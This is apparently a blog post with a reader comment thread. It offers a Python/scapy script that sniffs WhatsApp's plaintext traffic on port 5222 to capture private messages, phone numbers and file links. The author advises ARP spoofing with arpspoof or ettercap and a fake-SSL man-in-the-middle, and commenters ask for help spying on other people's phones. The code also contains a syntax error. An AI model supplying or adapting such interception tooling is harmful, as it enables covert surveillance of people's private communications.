WhatsAPP is a cross-platform app for phones that is used by thousands of people around the world, I’ve used it couple times, but not anymore, not when I knew it transfers almost everything in plaintext and rarely uses HTTPS only for changing status and in the registration process (?). I decided to write a sniffer/parser for whatsapp traffic to preview it in a simple and easy way. You will need to MITM/(or do what ever you want) and parse the traffic. (You will need scapy)
(Multiple vulnerabilities has been reported in whatsapp recently by sec-consult)
What does it parse:
- Received and sent messages
- Received and sent files
E.g:
DYN:~/whatsapp# python sniffer.py wlan0 ######################### ## whatsapp sniff v0.1 ## ## qnix@0x80.org ## ######################### [+] Interface : wlan0 [+] filter : tcp port 5222 To : *********** Msg : Hello, I will send you a file. To : ********** Filename : .jpg URL : https://mms*.whatsapp.net/a1/0/1/2/3/*md5hash*.jpg From : *********** Msg : Thanks file has been recieved, take this file too. From : *********** Filename : .jpg URL : https://mms*.whatsapp.net/a2/0/2/3/1/*md5hash*.jpg
Code ( or click here ):
#!/usr/bin/env python
import os
import sys
import scapy.all
import re
Previous_Msg = ""
Previous_Filename = ""
Files = []
Messages = []
Urls = []
def banner():
print "#########################"
print "## whatsapp sniff v0.1 ##"
print "## qnix@0x80.org ##"
print "#########################\n"
def whatsapp_parse(packet):
global Previous_Msg
global Previous_Filename
global Files
global Messages
global Urls
src = packet.sprintf("%IP.src%")
dst = packet.sprintf("%IP.dst%")
sport = packet.sprintf("%IP.sport%")
dport = packet.sprintf("%IP.dport%")
raw = packet.sprintf("%Raw.load%")
# Target Sending stuff
if dport == "5222":
Filename = ""
toNumber = ""
Url = ""
Msg = ""
try:
toNumber = re.sub("\D", "", raw)
if(toNumber[5:16].startswith("0")): toNumber = toNumber[6:17]
else: toNumber = toNumber[5:16]
try:
Filename = raw.split("file\\xfc")[1][1:37]
Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
except:pass
try: Msg = raw.split("\\xf8\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")
except:pass
except: pass
if(len(toNumber) >= 10):
if(len(Msg) >= 1 and Previous_Msg != Msg):
Previous_Msg = Msg
print "To : ", toNumber
print "Msg : ", Msg
Messages.append(Msg)
elif(len(Filename) >= 1 and Previous_Filename != Filename):
Previous_Filename = Filename
print "To : ", toNumber
print "Filename : ", Filename
print "URL : ", Url
Files.append(Filename)
Urls.append(Url)
# Recieved Messages
if sport == "5222":
Msg = ""
fromNumber = ""
Url = ""
Filename = ""
try:
fromNumber = re.sub("\D", "", raw)
if(fromNumber[5:16].startswith("0")): fromNumber = fromNumber[6:17]
else: fromNumber = fromNumber[5:16]
try:
Filename = raw.split("file\\xfc")[1][1:37]
Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
except: pass
try: Msg = raw.split("\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")
except: pass
except:pass
if(len(fromNumber) = 1 and Previous_Msg != Msg):
Previous_Msg = Msg
print "From : ", fromNumber
print "Msg : ", Msg
Messages.append(Msg)
elif(len(Filename) >= 1 and Previous_Filename != Filename):
Previous_Filename = Filename
print "From : ", fromNumber
print "Filename : ", Filename
print "URL : ", Url
Files.append(Filename)
Urls.append(Url)
def callback(packet):
sport = packet.sprintf("%IP.sport%")
dport = packet.sprintf("%IP.dport%")
raw = packet.sprintf("%Raw.load%")
if raw != '??':
if dport == "5222" or sport == "5222":
whatsapp_parse(packet)
def main():
banner()
if(len(sys.argv) != 2):
print "%s " % sys.argv[0]
sys.exit(1)
scapy.iface = sys.argv[1]
scapy.verb = 0
scapy.promisc = 0
expr = "tcp port 5222"
print "[+] Interface : ", scapy.iface
print "[+] filter : ", expr
scapy.all.sniff(filter=expr, prn=callback, store=0)
print "[+] iface %s" % scapy.iface
if __name__ == "__main__":
main()
Enjoy
as always you are amazing
brilliant :) im playing with this right now but parsing everything in wireshark….any chance you could do this as a windows or android app? just reply here will be checking! :P
This does work on windows just get python and scapy-win (http://www.secdev.org/projects/scapy/doc/installation.html#windows). As for porting this code to android (java) will be fun, but doesn’t worth the time. Anyway you can run this code on android with no problems get python, get scapy for android, get arpspoof. Enjoy
I tried your code, but it doesn’t seem to work. The packets are flowing trough but it seems like Whatsapp doesn’t use port 5222 anymore. Could it be that they changed port numbers ?
I tried your script on mac os x and got that message: “WARNING: fileno: pcapy API does not permit to get capure file descriptor. Bugs ahead! Press Enter to trigger packet reading”. Do you have any idea how to solve this issue?
I haven’t checked they might have changed it. If they did then just change the port number at these lines 108, 97, 64 and 33.
This is only a warning just ignore it and things should work.
I can’t get it work on my mac, does anyone have like a “step bt step” instruction, how to get it work ? thank you very much.
Hey can you pls give me the APK dates for whatsapp sniffer on phone ? because google removed it from the store :/ tahnk you
I’m sorry ainoyin, I don’t have mac around to create a step by step. Google will solve any problem you face.
I don’t have the apks
@ainoyin: got the same problem. Did you manage to find a step-by-step tutorial for Mac? Tried Google, but couldn’t find the right info. Thanks.
HI!! I’m trying your code but I cannot run it, I mean, I run it but I only se in my terminal:
WARNING: No route found for IPv6 destination :: (no default route?)
#########################
## whatsapp sniff v0.1 ##
## qnix@0×80.org ##
#########################
wlan0
[+] Interface : wlan0
[+] filter : tcp port 5222
And I’m sending and receiving messages from my phone and my girlsfriend’s one. I need wireshark or I shall se the results in the terminal?
Thanks!!
PD: I’ve installed scapy ;)
I think it could be te port number, cause it never call “whatsapp_parse”. Any ideas?
You need to perform a MITM attack on the phone/router/all use arpspoof or ettercap or write your own. Some people reported that newer versions of whatsapp doesn’t use plaintext communication anymore which means the script will not capture any plaintext data even if it was changed or fixed according to the new method they use. You might be able to find another vulnerability to sniff. E.g if whatsapp’s client doesn’t check the authenticity of the ssl certificate which means you can perform a MITM attack with fake ssl and get the original. It will look something like this:
Original :
[Phone-ssl]< ->[Whatsapp-ssl]
Spying :
[Phone-fakessl]< ->[You-ssl]< ->[whatsapp-ssl]
That can only happen if the client doesn’t really check the original SSL certificate (maybe hardcoded) into the client.
Hi,
Thanks for posting this. I am running the python script on linux. I run as:
# sudo python2.7 WhatAppPythonSniffer0.1.py wlan0
The process runs (till I do a ctrl^c), I get the following output:
WARNING: No route found for IPv6 destination :: (no default route?):
###################
## whatsapp sniff v0.1 ##
###################
[+] Interface: wlan0
[+] filter : tcp port 5223
However, I am not really sure what argument to pass to the program, whether eth0 or wlan0. I am running from a laptop connected wireless to my router.
The second thing I need to know is can anyone point to me what needs to be done in parallel to running the script? I read an MITM attack, but is there a detailed way on how to do so?
I have changed the port from 5222 to 5223 as a previous thread suggested, but nothing changed.
Thanks a lot for your advice.
Check out
http://arpspoof.sourceforge.net/
http://ettercap.sourceforge.net/
keep in mind that the vulnerability is most probably patched in newer versions since they support SSL now. Please read the previous comment
I get the following error:
No module named pcapy
Why?
Hi All,
i also can’t get it to work on my mac, but i think i am close (am new to python must say).
simon$ python sniffer.py wlan0
Traceback (most recent call last):
File "sniffer.py", line 5, in
import scapy.all
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/all.py", line 13, in
from arch import *
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/arch/__init__.py", line 71, in
from bsd import *
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/arch/bsd.py", line 10, in
from unix import *
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/arch/unix.py", line 17, in
from pcapdnet import *
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/arch/pcapdnet.py", line 26, in
import pcapy as pcap
ImportError: No module named pcapy
can somebody tell me how to get scapy.all imported?
Both of you should install scapy
google scapy
Is there is any way to do this now with whatsapp ?
How can I capture whatsapp data on m other phone
By the unbelievable stupidity of the questions these people are asking around here as technical feedback ( i.e. : asking -but I wanted it to work magically, what is this arpspoofing thing?) , becomes quite obvious that you attracted a horde of idiots with this script, and idiots, contrary to popular belief, are people desperate for power and to harm others with it. Don’t tell me this is for educational purposes, someone who asks the questions you’re being asked here is up for no real education.
I personally don’t think these people should be encouraged. Do you?
Saluting from Argentina :)
Hey. My question is a little off topic but is there any way to change the port Whatsapp uses or tunnel it some way on iPhone? The hotspot I mostly use blocks communications through all ports other than 8080 and I was looking for a way around it since I use Whatsapp alot!
Thanks
^not strictly on the iPhone actually. Android too.
hey mate, this code and link is all about sniffing whatspp. right?
im not as expert like u all are. but need advice. i have installed python on my windows7 machine/. i have python DOS too. What to do next? do i simply start typing this code given or what?
help me :)
Open a cmd window and type: python wlan0
and that’s it :D
I think whatsapp changed the ports!
I don’t get nothing on 5222!
Any ideas?
Pingback: EK005: Piraten, Prostituierte und Privatkopien! | Echokammer
I wanted to make this work, SO badly! Like…..really, sniffing this Whatsapp is a life definition thing. But I have absolutely NO IDEA what this is all about, I’m a Designer for Christ’s sake…I swear I tried to understand, I opened like 98573489 tutorials and read everything on Wikipedia, I even downloaded wireshark and phyton and scapy, but I don’t understand the essence of using the code, and how it interacts with this softwares…the farthest I’ve gone with codes is opening websites’s sources to “steal” good quality editable images…lol. Anyways, really hope I can find someone tr00 to help me, my time is running out :(
I am sniffing whatsapp trafic but its all SSL at the moment. So I am about to set up a MITM but need a keyword for google to continue. What software to use for a MITM when I already have all traffic flowing through my PC.
Hi brother , i know the whatsapp is encryption now . do you have any idea . Would you please release 0.2v sniffer whatsapp help us . thank you .
Paul
I actually wish to bookmark this particular article, “Sniffing Whatsapp0x80 | 0×80” http://stumbleread.com on my personal internet site.
Will you care in the event that Ido? Regards ,Ingeborg
I don’t mind
Thanks for your personal marvelous posting! I really enjoyed reading
it, you’re a great author. I will always bookmark your blog and will eventually come back later in life. I want to encourage one to continue your great posts, have a nice morning!